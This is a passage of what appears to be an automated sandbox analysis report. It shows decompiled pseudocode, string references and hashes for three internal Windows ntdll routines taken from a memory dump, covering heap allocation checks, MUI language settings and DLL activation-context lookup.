0x00a9a3a7
0x00a9a3b0
0x00a9a3b4
0x00a9a3bb
0x00a9a3d2
0x00a9a3da
0x00a9a3df
0x00a9a3e1
0x00a9a3e5
0x00a9a3ea
0x00a9a3f0
0x00a9a3f0
0x00a9a3e1
0x00000000
0x00a9a3bb
0x00a9a394

Strings

HEAP: , xrefs: 00AE1E95, 00AE1F7E, 00AE2131, 00AE2269
HEAP[%wZ]: , xrefs: 00AE1E88, 00AE1F71, 00AE2124, 00AE225C
(LONG)FreeEntry->Size > 1, xrefs: 00AE213C
(UCRBlock != NULL), xrefs: 00AE1EA0
(!TrailingUCR), xrefs: 00AE2274
((LONG)FreeEntry->Size > 1), xrefs: 00AE1F89

Memory Dump Source

Source File: 00000001.00000002.288306142.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true

Similarity

API ID:
String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
API String ID: 0-523794902
Opcode ID: 95b146112dad330456060b1e081a54e6e86f17468850d1e9f5652476d7a474c0
Instruction ID: a5c5bf24cb37917937ff17dc046e4fdc47315c08d8b05900e609d51165fb26e6
Opcode Fuzzy Hash: 95b146112dad330456060b1e081a54e6e86f17468850d1e9f5652476d7a474c0
Instruction Fuzzy Hash: 5442BE357183819FCB15CF29C984B2ABBE5BF98304F14896AF8868B352D734D941CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00B32D82, Relevance: 7.7, Strings: 6, Instructions: 228
COMMONCrypto

Download Yara Rule

C-Code - Quality: 64%

			E00B32D82(void* __ebx, intOrPtr* __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t83;
				signed char _t89;
				intOrPtr _t90;
				signed char _t101;
				signed int _t102;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				intOrPtr _t108;
				intOrPtr _t112;
				short* _t130;
				short _t131;
				signed int _t148;
				intOrPtr _t149;
				signed int* _t154;
				short* _t165;
				signed int _t171;
				void* _t182;

				_push(0x44);
				_push(0xb50e80);
				E00ACD0E8(__ebx, __edi, __esi);
				_t177 = __edx;
				_t181 = __ecx;
				 *((intOrPtr*)(_t182 - 0x44)) = __ecx;
				 *((char*)(_t182 - 0x1d)) = 0;
				 *(_t182 - 0x24) = 0;
				if(( *(__ecx + 0x44) & 0x01000000) == 0) {
					 *((intOrPtr*)(_t182 - 4)) = 0;
					 *((intOrPtr*)(_t182 - 4)) = 1;
					_t83 = E00A740E1("RtlAllocateHeap");
					__eflags = _t83;
					if(_t83 == 0) {
						L48:
						 *(_t182 - 0x24) = 0;
						L49:
						 *((intOrPtr*)(_t182 - 4)) = 0;
						 *((intOrPtr*)(_t182 - 4)) = 0xfffffffe;
						E00B330C4();
						goto L50;
					}
					_t89 =  *(__ecx + 0x44) | __edx | 0x10000100;
					 *(_t182 - 0x28) = _t89;
					 *(_t182 - 0x3c) = _t89;
					_t177 =  *(_t182 + 8);
					__eflags = _t177;
					if(_t177 == 0) {
						_t171 = 1;
						__eflags = 1;
					} else {
						_t171 = _t177;
					}
					_t148 =  *((intOrPtr*)(_t181 + 0x94)) + _t171 &  *(_t181 + 0x98);
					__eflags = _t148 - 0x10;
					if(_t148 < 0x10) {
						_t148 = 0x10;
					}
					_t149 = _t148 + 8;
					 *((intOrPtr*)(_t182 - 0x48)) = _t149;
					__eflags = _t149 - _t177;
					if(_t149 < _t177) {
						L44:
						_t90 =  *[fs:0x30];
						__eflags =  *(_t90 + 0xc);
						if( *(_t90 + 0xc) == 0) {
							_push("HEAP: ");
							E00A7B150();
						} else {
							E00A7B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push( *((intOrPtr*)(_t181 + 0x78)));
						E00A7B150("Invalid allocation size - %Ix (exceeded %Ix)\n", _t177);
						goto L48;
					} else {
						__eflags = _t149 -  *((intOrPtr*)(_t181 + 0x78));
						if(_t149 >  *((intOrPtr*)(_t181 + 0x78))) {
							goto L44;
						}
						__eflags = _t89 & 0x00000001;
						if((_t89 & 0x00000001) != 0) {
							_t178 =  *(_t182 - 0x28);
						} else {
							E00A8EEF0( *((intOrPtr*)(_t181 + 0xc8)));
							 *((char*)(_t182 - 0x1d)) = 1;
							_t178 =  *(_t182 - 0x28) | 0x00000001;
							 *(_t182 - 0x3c) =  *(_t182 - 0x28) | 0x00000001;
						}
						E00B34496(_t181, 0);
						_t177 = L00A94620(_t181, _t181, _t178,  *(_t182 + 8));
						 *(_t182 - 0x24) = _t177;
						_t173 = 1;
						E00B349A4(_t181);
						__eflags = _t177;
						if(_t177 == 0) {
							goto L49;
						} else {
							_t177 = _t177 + 0xfffffff8;
							__eflags =  *((char*)(_t177 + 7)) - 5;
							if( *((char*)(_t177 + 7)) == 5) {
								_t177 = _t177 - (( *(_t177 + 6) & 0x000000ff) << 3);
								__eflags = _t177;
							}
							_t154 = _t177;
							 *(_t182 - 0x40) = _t177;
							__eflags =  *(_t181 + 0x4c);
							if( *(_t181 + 0x4c) != 0) {
								 *_t177 =  *_t177 ^  *(_t181 + 0x50);
								__eflags =  *(_t177 + 3) - (_t154[0] ^ _t154[0] ^  *_t154);
								if(__eflags != 0) {
									_push(_t154);
									_t173 = _t177;
									E00B2FA2B(0, _t181, _t177, _t177, _t181, __eflags);
								}
							}
							__eflags =  *(_t177 + 2) & 0x00000002;
							if(( *(_t177 + 2) & 0x00000002) == 0) {
								_t101 =  *(_t177 + 3);
								 *(_t182 - 0x29) = _t101;
								_t102 = _t101 & 0x000000ff;
							} else {
								_t130 = E00A71F5B(_t177);
								 *((intOrPtr*)(_t182 - 0x30)) = _t130;
								__eflags =  *(_t181 + 0x40) & 0x08000000;
								if(( *(_t181 + 0x40) & 0x08000000) == 0) {
									 *_t130 = 0;
								} else {
									_t131 = E00AA16C7(1, _t173);
									_t165 =  *((intOrPtr*)(_t182 - 0x30));
									 *_t165 = _t131;
									_t130 = _t165;
								}
								_t102 =  *(_t130 + 2) & 0x0000ffff;
							}
							 *(_t182 - 0x34) = _t102;
							 *(_t182 - 0x28) = _t102;
							__eflags =  *(_t181 + 0x4c);
							if( *(_t181 + 0x4c) != 0) {
								 *(_t177 + 3) =  *(_t177 + 2) ^  *(_t177 + 1) ^  *_t177;
								 *_t177 =  *_t177 ^  *(_t181 + 0x50);
								__eflags =  *_t177;
							}
							__eflags =  *(_t181 + 0x40) & 0x20000000;
							if(( *(_t181 + 0x40) & 0x20000000) != 0) {
								__eflags = 0;
								E00B34496(_t181, 0);
							}
							__eflags =  *(_t182 - 0x24) -  *0xb66360; // 0x0
							_t104 =  *[fs:0x30];
							if(__eflags != 0) {
								_t105 =  *(_t104 + 0x68);
								 *(_t182 - 0x4c) = _t105;
								__eflags = _t105 & 0x00000800;
								if((_t105 & 0x00000800) == 0) {
									goto L49;
								}
								_t106 =  *(_t182 - 0x34);
								__eflags = _t106;
								if(_t106 == 0) {
									goto L49;
								}
								__eflags = _t106 -  *0xb66364; // 0x0
								if(__eflags != 0) {
									goto L49;
								}
								__eflags =  *((intOrPtr*)(_t181 + 0x7c)) -  *0xb66366; // 0x0
								if(__eflags != 0) {
									goto L49;
								}
								_t108 =  *[fs:0x30];
								__eflags =  *(_t108 + 0xc);
								if( *(_t108 + 0xc) == 0) {
									_push("HEAP: ");
									E00A7B150();
								} else {
									E00A7B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push(E00B1D455(_t181,  *(_t182 - 0x28)));
								_push( *(_t182 + 8));
								E00A7B150("Just allocated block at %p for 0x%Ix bytes with tag %ws\n",  *(_t182 - 0x24));
								goto L34;
							} else {
								__eflags =  *(_t104 + 0xc);
								if( *(_t104 + 0xc) == 0) {
									_push("HEAP: ");
									E00A7B150();
								} else {
									E00A7B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push( *(_t182 + 8));
								E00A7B150("Just allocated block at %p for %Ix bytes\n",  *0xb66360);
								L34:
								_t112 =  *[fs:0x30];
								__eflags =  *((char*)(_t112 + 2));
								if( *((char*)(_t112 + 2)) != 0) {
									 *0xb66378 = 1;
									 *0xb660c0 = 0;
									asm("int3");
									 *0xb66378 = 0;
								}
								goto L49;
							}
						}
					}
				} else {
					_t181 =  *0xb65708; // 0x0
					 *0xb6b1e0(__ecx, __edx,  *(_t182 + 8));
					 *_t181();
					L50:
					return E00ACD130(0, _t177, _t181);
				}
			}

0x00b32d82
0x00b32d84
0x00b32d89
0x00b32d8e
0x00b32d90
0x00b32d92
0x00b32d97
0x00b32d9a
0x00b32da4
0x00b32dc0
0x00b32dc3
0x00b32dd1
0x00b32dd6
0x00b32dd8
0x00b330a7
0x00b330a7
0x00b330aa
0x00b330aa
0x00b330ad
0x00b330b4
0x00000000
0x00b330b9
0x00b32de3
0x00b32de8
0x00b32deb
0x00b32dee
0x00b32df1
0x00b32df3
0x00b32dfb
0x00b32dfb
0x00b32df5
0x00b32df5
0x00b32df5
0x00b32e04
0x00b32e0a
0x00b32e0d
0x00b32e11
0x00b32e11
0x00b32e12
0x00b32e15
0x00b32e18
0x00b32e1a
0x00b33027
0x00b33027
0x00b3302d
0x00b33030
0x00b3304f
0x00b33054
0x00b33032
0x00b33047
0x00b3304c
0x00b3305a
0x00b33063
0x00000000
0x00b32e20
0x00b32e20
0x00b32e23
0x00000000
0x00000000
0x00b32e29
0x00b32e2b
0x00b32e47
0x00b32e2d
0x00b32e33
0x00b32e38
0x00b32e3f
0x00b32e42
0x00b32e42
0x00b32e4e
0x00b32e5d
0x00b32e5f
0x00b32e62
0x00b32e66
0x00b32e6b
0x00b32e6d
0x00000000
0x00b32e73
0x00b32e73
0x00b32e76
0x00b32e7a
0x00b32e83
0x00b32e83
0x00b32e83
0x00b32e85
0x00b32e87
0x00b32e8a
0x00b32e8d
0x00b32e92
0x00b32e9c
0x00b32e9f
0x00b32ea1
0x00b32ea2
0x00b32ea6
0x00b32ea6
0x00b32e9f
0x00b32eab
0x00b32eaf
0x00b32edf
0x00b32ee2
0x00b32ee5
0x00b32eb1
0x00b32eb3
0x00b32eb8
0x00b32ebd
0x00b32ec4
0x00b32ed6
0x00b32ec6
0x00b32ec7
0x00b32ecc
0x00b32ecf
0x00b32ed2
0x00b32ed2
0x00b32ed9
0x00b32ed9
0x00b32ee8
0x00b32eeb
0x00b32eef
0x00b32ef2
0x00b32efe
0x00b32f04
0x00b32f04
0x00b32f04
0x00b32f06
0x00b32f0d
0x00b32f0f
0x00b32f13
0x00b32f13
0x00b32f1b
0x00b32f21
0x00b32f27
0x00b32f95
0x00b32f98
0x00b32f9b
0x00b32fa0
0x00000000
0x00000000
0x00b32fa6
0x00b32fa9
0x00b32fac
0x00000000
0x00000000
0x00b32fb2
0x00b32fb9
0x00000000
0x00000000
0x00b32fc3
0x00b32fca
0x00000000
0x00000000
0x00b32fd0
0x00b32fd6
0x00b32fd9
0x00b32ff8
0x00b32ffd
0x00b32fdb
0x00b32ff0
0x00b32ff5
0x00b3300e
0x00b3300f
0x00b3301a
0x00000000
0x00b32f29
0x00b32f29
0x00b32f2c
0x00b32f4b
0x00b32f50
0x00b32f2e
0x00b32f43
0x00b32f48
0x00b32f56
0x00b32f64
0x00b32f6c
0x00b32f6c
0x00b32f72
0x00b32f76
0x00b32f7c
0x00b32f83
0x00b32f89
0x00b32f8a
0x00b32f8a
0x00000000
0x00b32f76
0x00b32f27
0x00b32e6d
0x00b32da6
0x00b32dab
0x00b32db3
0x00b32db9
0x00b330bc
0x00b330c1
0x00b330c1

Strings

HEAP: , xrefs: 00B32F4B, 00B32FF8, 00B3304F
RtlAllocateHeap, xrefs: 00B32DCA
Just allocated block at %p for %Ix bytes, xrefs: 00B32F5F
HEAP[%wZ]: , xrefs: 00B32F3E, 00B32FEB, 00B33042
Just allocated block at %p for 0x%Ix bytes with tag %ws, xrefs: 00B33015
Invalid allocation size - %Ix (exceeded %Ix), xrefs: 00B3305E

Memory Dump Source

Source File: 00000001.00000002.288306142.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
API String ID: 0-1745908468
Opcode ID: 625d0614a48a40d56eed373603f403d62014596c549832f229ba2846574d7330
Instruction ID: 5ccbd8f10878229589b3b1e0a34227e77404dcc4e42e9fd0f57964f9d2e48c9d
Opcode Fuzzy Hash: 625d0614a48a40d56eed373603f403d62014596c549832f229ba2846574d7330
Instruction Fuzzy Hash: FE91E431510640DFCB26DF68D951BAEBBF1FF49B10F2880A9E449A7392C7759941CB14

Uniqueness

Uniqueness Score: -1.00%

Function 00A83D34, Relevance: 6.7, Strings: 5, Instructions: 435
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E00A83D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E00A81B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L00A977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E00A81B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L00A977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E00A81B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E00A81B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E00A81B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L00A977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L00A977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L00A94620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E00ABF3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E00AC1370(_t276, 0xa54e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E00ABBB40(0,  &_v68, _t170);
									if(L00A843C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L00A977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L00A977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E00ABBB40(_t257,  &_v68, _t243);
								if(L00A843C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E00AC1370(_t278, 0xa54e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L00A94620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E00ABF3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E00AC1370(_v16, 0xa54e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E00ABBB40(_t262,  &_v68, _t244);
								if(L00A843C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E00AC1370(_t282, 0xa54e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E00ABBB40(_t262,  &_v68, _t201);
							if(L00A843C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L00A977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L00A977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L00A94620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E00ABF3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E00AC1370(_t280, 0xa54e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E00ABBB40(_t267,  &_v68, _t245);
							if(L00A843C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E00AC1370(_t284, 0xa54e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E00ABBB40(_t267,  &_v68, _t224);
						if(L00A843C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L00A977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L00A977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}

0x00a83d3c
0x00a83d42
0x00a83d44
0x00a83d46
0x00a83d49
0x00a83d4c
0x00a83d4f
0x00a83d52
0x00a83d55
0x00a83d58
0x00a83d5b
0x00a83d5f
0x00a83d61
0x00a83d66
0x00ad8213
0x00ad8218
0x00a84085
0x00a84088
0x00a8408e
0x00a84094
0x00a8409a
0x00a840a0
0x00a840a6
0x00a840a9
0x00a840af
0x00a840b6
0x00a840bd
0x00a840bd
0x00a83d83
0x00ad821f
0x00ad8229
0x00ad8238
0x00ad8238
0x00ad823d
0x00ad823d
0x00a83da0
0x00a83daf
0x00a83db5
0x00a83dba
0x00a83dba
0x00a83dd4
0x00a83e94
0x00a83eab
0x00a83f6d
0x00a83f84
0x00a8406b
0x00a8406b
0x00a8406e
0x00a8406e
0x00a84070
0x00a84074
0x00ad8351
0x00ad8351
0x00a8407a
0x00a8407f
0x00ad835d
0x00ad8370
0x00ad8377
0x00ad8379
0x00ad837c
0x00ad837c
0x00ad835d
0x00000000
0x00a8407f
0x00a83f8a
0x00a83f8d
0x00a83f90
0x00a83f95
0x00ad830d
0x00ad830f
0x00a83f9b
0x00a83fac
0x00a83fae
0x00a83fb1
0x00a83fb1
0x00a83fb6
0x00ad8317
0x00ad831a
0x00000000
0x00a83fbc
0x00a83fc1
0x00a83fc9
0x00a83fd7
0x00a83fda
0x00a83fdd
0x00a84021
0x00a84021
0x00a84029
0x00a84030
0x00a84044
0x00a84046
0x00a84046
0x00a84044
0x00a84049
0x00ad8327
0x00ad8334
0x00ad8339
0x00ad833c
0x00a8404f
0x00a8404f
0x00a8404f
0x00a84051
0x00a84056
0x00a84063
0x00a84063
0x00a84068
0x00000000
0x00a84068
0x00a83fdf
0x00a83fe2
0x00a83fe4
0x00a83fe7
0x00a83fef
0x00a84003
0x00a84005
0x00a84005
0x00a8400c
0x00a84013
0x00a84016
0x00a84017
0x00a8401b
0x00a8401e
0x00000000
0x00a8401e
0x00a83fb6
0x00a83eb1
0x00a83eb4
0x00a83eb7
0x00a83ebc
0x00ad82a9
0x00ad82ab
0x00a83ec2
0x00a83ed3
0x00a83ed5
0x00a83ed8
0x00a83ed8
0x00a83edd
0x00ad82b3
0x00ad82b6
0x00000000
0x00a83ee3
0x00a83ee8
0x00a83eed
0x00a83ef0
0x00a83ef3
0x00a83f02
0x00a83f05
0x00a83f08
0x00ad82c0
0x00ad82c3
0x00ad82c5
0x00ad82c8
0x00ad82d0
0x00ad82e4
0x00ad82e6
0x00ad82e6
0x00ad82ed
0x00ad82f4
0x00ad82f7
0x00ad82f8
0x00ad82fc
0x00ad82ff
0x00ad82ff
0x00a83f0e
0x00a83f11
0x00a83f16
0x00a83f1d
0x00a83f31
0x00ad8307
0x00ad8307
0x00a83f31
0x00a83f39
0x00a83f48
0x00a83f4d
0x00a83f50
0x00a83f50
0x00a83f53
0x00a83f58
0x00a83f65
0x00a83f65
0x00a83f6a
0x00000000
0x00a83f6a
0x00a83edd
0x00a83dda
0x00a83ddd
0x00a83de0
0x00a83de5
0x00ad8245
0x00a83deb
0x00a83df7
0x00a83dfc
0x00a83dfe
0x00a83e01
0x00a83e01
0x00a83e06
0x00ad824d
0x00ad824f
0x00ad8254
0x00000000
0x00a83e0c
0x00a83e11
0x00a83e16
0x00a83e19
0x00a83e29
0x00a83e2c
0x00a83e2f
0x00ad825c
0x00ad825f
0x00ad8261
0x00ad8264
0x00ad826c
0x00ad8280
0x00ad8282
0x00ad8282
0x00ad8289
0x00ad8290
0x00ad8293
0x00ad8294
0x00ad8298
0x00ad829b
0x00ad829b
0x00a83e35
0x00a83e38
0x00a83e3d
0x00a83e44
0x00a83e58
0x00ad82a3
0x00ad82a3
0x00a83e58
0x00a83e60
0x00a83e6f
0x00a83e74
0x00a83e77
0x00a83e77
0x00a83e7a
0x00a83e7f
0x00a83e8c
0x00a83e8c
0x00a83e91
0x00000000
0x00a83e91

Strings

Kernel-MUI-Number-Allowed, xrefs: 00A83D8C
Kernel-MUI-Language-Disallowed, xrefs: 00A83E97
Kernel-MUI-Language-SKU, xrefs: 00A83F70
WindowsExcludedProcs, xrefs: 00A83D6F
Kernel-MUI-Language-Allowed, xrefs: 00A83DC0

Memory Dump Source

Source File: 00000001.00000002.288306142.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true

Similarity

API ID:
String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
API String ID: 0-258546922
Opcode ID: 095b0f3a082d8bc61d69eca1e9b0c1e1210d2b69a2d0515908b86e139873f86c
Instruction ID: 864a79a88951a0d7dac1a586d72a0b7885ac5449fab4e8af73693ccc9ce2cfd8
Opcode Fuzzy Hash: 095b0f3a082d8bc61d69eca1e9b0c1e1210d2b69a2d0515908b86e139873f86c
Instruction Fuzzy Hash: 39F1FD72D10619EFCF11EF98CA41AEEB7B9FF48B50F15006AE905A7251D7749E01CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00AA8E00, Relevance: 6.4, Strings: 5, Instructions: 126
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E00AA8E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0xb6d360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0xb68464; // 0x75150110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0xb65780 & 0x00000003) != 0) {
							E00AF5510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0xb65780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E00ABB640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0xb67984; // 0x7b2b20
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0xb68464; // 0x75150110
					 *0xb6b1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E00AA9B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0xb65780 & 0x00000005) != 0) {
						_push(_t49);
						E00AF5510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}

0x00aa8e0f
0x00aa8e16
0x00aa8e19
0x00aa8e1b
0x00aa8e21
0x00aa8e7f
0x00aa8e85
0x00ae9354
0x00ae936c
0x00ae9371
0x00ae937b
0x00ae9381
0x00ae9381
0x00ae937b
0x00aa8e9d
0x00aa8e9d
0x00aa8e29
0x00aa8e2c
0x00aa8e38
0x00aa8e3e
0x00aa8e43
0x00aa8eb5
0x00aa8eb9
0x00ae92aa
0x00ae92af
0x00ae92e8
0x00ae92e8
0x00ae92af
0x00aa8eb9
0x00aa8e45
0x00aa8e53
0x00aa8e5b
0x00aa8e5f
0x00aa8e78
0x00aa8e78
0x00aa8e7d
0x00aa8ec3
0x00aa8ecd
0x00aa8ed2
0x00aa8ed2
0x00aa8ec5
0x00aa8ec5
0x00000000
0x00aa8e7d
0x00aa8e67
0x00aa8ea4
0x00ae931a
0x00000000
0x00000000
0x00ae9320
0x00aa8ea4
0x00aa8e70
0x00ae9325
0x00ae9340
0x00ae9345
0x00ae9345
0x00aa8e76
0x00000000
0x00000000
0x00000000
0x00000000

Strings

Querying the active activation context failed with status 0x%08lx, xrefs: 00AE9357
+{, xrefs: 00AA8E2C
